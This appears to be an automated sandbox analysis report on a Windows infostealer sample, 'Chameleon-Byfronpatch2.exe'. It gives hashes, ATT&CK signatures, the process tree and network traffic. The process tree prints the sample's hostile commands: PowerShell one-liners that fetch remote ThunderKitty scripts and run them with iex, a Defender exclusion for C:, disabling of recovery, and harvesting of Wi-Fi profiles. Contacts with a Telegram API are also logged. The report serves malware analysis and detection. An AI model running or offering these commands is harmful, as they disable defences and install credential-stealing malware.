585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb

Analysis

max time kernel
5s
max time network
13s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13/08/2024, 14:19 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Chameleon-Byfronpatch2.exe
Size

9.2MB
MD5

addbf6301c1ea797554a0152da23d5ae
SHA1

01a22ed2bb77ff84546147098348a07bc0eecbc6
SHA256

585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
SHA512

9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
SSDEEP

98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	4888	powershell.exe
10	4808	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4480	powershell.exe
4888	powershell.exe
4808	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Drivers\etc\hosts	Chameleon-Byfronpatch2.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2344	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com
8	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
380	ARP.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1120	netsh.exe
3148	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
1496	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2016	ipconfig.exe
1496	NETSTAT.EXE
632	ipconfig.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4888	powershell.exe
4480	powershell.exe
4808	powershell.exe
4888	powershell.exe
4808	powershell.exe
4480	powershell.exe
4808	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeIncreaseQuotaPrivilege	4808	powershell.exe
Token: SeSecurityPrivilege	4808	powershell.exe
Token: SeTakeOwnershipPrivilege	4808	powershell.exe
Token: SeLoadDriverPrivilege	4808	powershell.exe
Token: SeSystemProfilePrivilege	4808	powershell.exe
Token: SeSystemtimePrivilege	4808	powershell.exe
Token: SeProfSingleProcessPrivilege	4808	powershell.exe
Token: SeIncBasePriorityPrivilege	4808	powershell.exe
Token: SeCreatePagefilePrivilege	4808	powershell.exe
Token: SeBackupPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	4808	powershell.exe
Token: SeShutdownPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeSystemEnvironmentPrivilege	4808	powershell.exe
Token: SeRemoteShutdownPrivilege	4808	powershell.exe
Token: SeUndockPrivilege	4808	powershell.exe
Token: SeManageVolumePrivilege	4808	powershell.exe
Token: 33	4808	powershell.exe
Token: 34	4808	powershell.exe
Token: 35	4808	powershell.exe
Token: 36	4808	powershell.exe
Token: SeIncreaseQuotaPrivilege	4808	powershell.exe
Token: SeSecurityPrivilege	4808	powershell.exe
Token: SeTakeOwnershipPrivilege	4808	powershell.exe
Token: SeLoadDriverPrivilege	4808	powershell.exe
Token: SeSystemProfilePrivilege	4808	powershell.exe
Token: SeSystemtimePrivilege	4808	powershell.exe
Token: SeProfSingleProcessPrivilege	4808	powershell.exe
Token: SeIncBasePriorityPrivilege	4808	powershell.exe
Token: SeCreatePagefilePrivilege	4808	powershell.exe
Token: SeBackupPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	4808	powershell.exe
Token: SeShutdownPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeSystemEnvironmentPrivilege	4808	powershell.exe
Token: SeRemoteShutdownPrivilege	4808	powershell.exe
Token: SeUndockPrivilege	4808	powershell.exe
Token: SeManageVolumePrivilege	4808	powershell.exe
Token: 33	4808	powershell.exe
Token: 34	4808	powershell.exe
Token: 35	4808	powershell.exe
Token: 36	4808	powershell.exe
Token: SeIncreaseQuotaPrivilege	4808	powershell.exe
Token: SeSecurityPrivilege	4808	powershell.exe
Token: SeTakeOwnershipPrivilege	4808	powershell.exe
Token: SeLoadDriverPrivilege	4808	powershell.exe
Token: SeSystemProfilePrivilege	4808	powershell.exe
Token: SeSystemtimePrivilege	4808	powershell.exe
Token: SeProfSingleProcessPrivilege	4808	powershell.exe
Token: SeIncBasePriorityPrivilege	4808	powershell.exe
Token: SeCreatePagefilePrivilege	4808	powershell.exe
Token: SeBackupPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	4808	powershell.exe
Token: SeShutdownPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeSystemEnvironmentPrivilege	4808	powershell.exe
Token: SeRemoteShutdownPrivilege	4808	powershell.exe
Token: SeUndockPrivilege	4808	powershell.exe
Token: SeManageVolumePrivilege	4808	powershell.exe
Token: 33	4808	powershell.exe
Token: 34	4808	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 1068 wrote to memory of 3984	1068	Chameleon-Byfronpatch2.exe	84
PID 1068 wrote to memory of 3984	1068	Chameleon-Byfronpatch2.exe	84
PID 1068 wrote to memory of 4480	1068	Chameleon-Byfronpatch2.exe	86
PID 1068 wrote to memory of 4480	1068	Chameleon-Byfronpatch2.exe	86
PID 1068 wrote to memory of 4888	1068	Chameleon-Byfronpatch2.exe	87
PID 1068 wrote to memory of 4888	1068	Chameleon-Byfronpatch2.exe	87
PID 1068 wrote to memory of 4808	1068	Chameleon-Byfronpatch2.exe	90
PID 1068 wrote to memory of 4808	1068	Chameleon-Byfronpatch2.exe	90
PID 1068 wrote to memory of 3956	1068	Chameleon-Byfronpatch2.exe	88
PID 1068 wrote to memory of 3956	1068	Chameleon-Byfronpatch2.exe	88
PID 1068 wrote to memory of 3576	1068	Chameleon-Byfronpatch2.exe	91
PID 1068 wrote to memory of 3576	1068	Chameleon-Byfronpatch2.exe	91
PID 3576 wrote to memory of 224	3576	cmd.exe	96
PID 3576 wrote to memory of 224	3576	cmd.exe	96
PID 4888 wrote to memory of 884	4888	powershell.exe	97
PID 4888 wrote to memory of 884	4888	powershell.exe	97
PID 4808 wrote to memory of 1948	4808	powershell.exe	98
PID 4808 wrote to memory of 1948	4808	powershell.exe	98
PID 1948 wrote to memory of 3056	1948	csc.exe	100
PID 1948 wrote to memory of 3056	1948	csc.exe	100
PID 884 wrote to memory of 2156	884	csc.exe	99
PID 884 wrote to memory of 2156	884	csc.exe	99
PID 4808 wrote to memory of 1120	4808	powershell.exe	104
PID 4808 wrote to memory of 1120	4808	powershell.exe	104
PID 4808 wrote to memory of 4632	4808	powershell.exe	106
PID 4808 wrote to memory of 4632	4808	powershell.exe	106
PID 4632 wrote to memory of 1052	4632	net.exe	107
PID 4632 wrote to memory of 1052	4632	net.exe	107
PID 4808 wrote to memory of 2344	4808	powershell.exe	108
PID 4808 wrote to memory of 2344	4808	powershell.exe	108
PID 4808 wrote to memory of 3956	4808	powershell.exe	109
PID 4808 wrote to memory of 3956	4808	powershell.exe	109
PID 4808 wrote to memory of 1908	4808	powershell.exe	110
PID 4808 wrote to memory of 1908	4808	powershell.exe	110
PID 1908 wrote to memory of 3436	1908	net.exe	111
PID 1908 wrote to memory of 3436	1908	net.exe	111
PID 4808 wrote to memory of 2016	4808	powershell.exe	112
PID 4808 wrote to memory of 2016	4808	powershell.exe	112
PID 4808 wrote to memory of 1544	4808	powershell.exe	113
PID 4808 wrote to memory of 1544	4808	powershell.exe	113
PID 1544 wrote to memory of 3596	1544	net.exe	114
PID 1544 wrote to memory of 3596	1544	net.exe	114
PID 4808 wrote to memory of 1968	4808	powershell.exe	115
PID 4808 wrote to memory of 1968	4808	powershell.exe	115
PID 4808 wrote to memory of 1496	4808	powershell.exe	116
PID 4808 wrote to memory of 1496	4808	powershell.exe	116
PID 4808 wrote to memory of 5016	4808	powershell.exe	117
PID 4808 wrote to memory of 5016	4808	powershell.exe	117
PID 4808 wrote to memory of 632	4808	powershell.exe	118
PID 4808 wrote to memory of 632	4808	powershell.exe	118
PID 4808 wrote to memory of 3104	4808	powershell.exe	119
PID 4808 wrote to memory of 3104	4808	powershell.exe	119
PID 4808 wrote to memory of 380	4808	powershell.exe	120
PID 4808 wrote to memory of 380	4808	powershell.exe	120
PID 4808 wrote to memory of 3148	4808	powershell.exe	121
PID 4808 wrote to memory of 3148	4808	powershell.exe	121

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3984	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
"C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:1068
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:3984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4888
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9395.tmp" "c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\CSCE265A0B6DDB64834B851568920694CAC.TMP"
      4⤵
      PID:2156
- C:\Windows\system32\reagentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:3956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vp3movdc\vp3movdc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1948
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9396.tmp" "c:\Users\Admin\AppData\Local\Temp\vp3movdc\CSCCEC06B077B884009AFF8CB25DBE50B2.TMP"
      4⤵
      PID:3056
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1120
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:1052
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2344
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:3956
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3436
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:2016
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:3596
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:1968
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:1496
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:5016
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:632
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3104
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:380
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3148
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3576
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:224

Network

DNS

api.telegram.org

ipconfig.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
DNS

220.167.154.149.in-addr.arpa

ipconfig.exe

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

ipconfig.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133
GET

https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1

powershell.exe

Remote address:

185.199.108.133:443

Request

GET /EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 617
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "f444ba7ea4531399f26b6eac1490d5c9ed57624eda8be597eb1b22193c39d280"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 95D6:3D1DA0:382913:46B64E:66BB6BAD
Accept-Ranges: bytes
Date: Tue, 13 Aug 2024 14:20:29 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600042-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1723558830.626993,VS0,VE249
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: de723d08182fdcf76e5e708c77617e09ebf783dc
Expires: Tue, 13 Aug 2024 14:25:29 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1

powershell.exe

Remote address:

185.199.108.133:443

Request

GET /EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 5753
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "36cc62445a08a962a9d3aa0a0bfd23233e35ac3e4082aa53adb300575fb6e171"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: FDD1:1CE552:1A5CAF:2035D4:66BB6BAB
Accept-Ranges: bytes
Date: Tue, 13 Aug 2024 14:20:29 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420116-LON
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1723558830.629716,VS0,VE128
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 852db7b73d76fb6d8b13c24a45c96c05d0d84505
Expires: Tue, 13 Aug 2024 14:25:29 GMT
Source-Age: 0
DNS

133.108.199.185.in-addr.arpa

ipconfig.exe

Remote address:

8.8.8.8:53

Request

133.108.199.185.in-addr.arpa

IN PTR

Response

133.108.199.185.in-addr.arpa

IN PTR

cdn-185-199-108-133githubcom
DNS

g.bing.com

ipconfig.exe

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

13.107.21.237

dual-a-0034.a-msedge.net

IN A

204.79.197.237
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=16989FAAE546674022188B70E4A6660D; domain=.bing.com; expires=Sun, 07-Sep-2025 14:20:31 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 592E06E2D70541EB91FB451AD1682A27 Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:31Z
date: Tue, 13 Aug 2024 14:20:30 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=16989FAAE546674022188B70E4A6660D

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=Wb4ONtm53ejkU487KI-Q6IVpGfYOD5pXdCY4de8M5qY; domain=.bing.com; expires=Sun, 07-Sep-2025 14:20:32 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 43524FD91D884AD4B9E20979AA3602EA Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:32Z
date: Tue, 13 Aug 2024 14:20:31 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=16989FAAE546674022188B70E4A6660D; MSPTC=Wb4ONtm53ejkU487KI-Q6IVpGfYOD5pXdCY4de8M5qY

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 295D2F9956D344BA8A7A3D7A43A94EE3 Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:32Z
date: Tue, 13 Aug 2024 14:20:31 GMT
DNS

83.210.23.2.in-addr.arpa

ipconfig.exe

Remote address:

8.8.8.8:53

Request

83.210.23.2.in-addr.arpa

IN PTR

Response

83.210.23.2.in-addr.arpa

IN PTR

a2-23-210-83deploystaticakamaitechnologiescom
DNS

72.32.126.40.in-addr.arpa

ipconfig.exe

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
DNS

237.21.107.13.in-addr.arpa

ipconfig.exe

Remote address:

8.8.8.8:53

Request

237.21.107.13.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response

149.154.167.220:443

api.telegram.org

tls

Chameleon-Byfronpatch2.exe

920 B
6.8kB
12
12
149.154.167.220:443

api.telegram.org

tls

Chameleon-Byfronpatch2.exe

86.0kB
12.9kB
81
57
185.199.108.133:443

https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1

tls, http

powershell.exe

997 B
7.1kB
10
11

HTTP Request

GET https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1

tls, http

powershell.exe

985 B
11.1kB
10
14

HTTP Request

GET https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1

HTTP Response

200
13.107.21.237:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

tls, http2

3.0kB
10.7kB
25
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=

HTTP Response

204

8.8.8.8:53

api.telegram.org

dns

ipconfig.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

ipconfig.exe

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
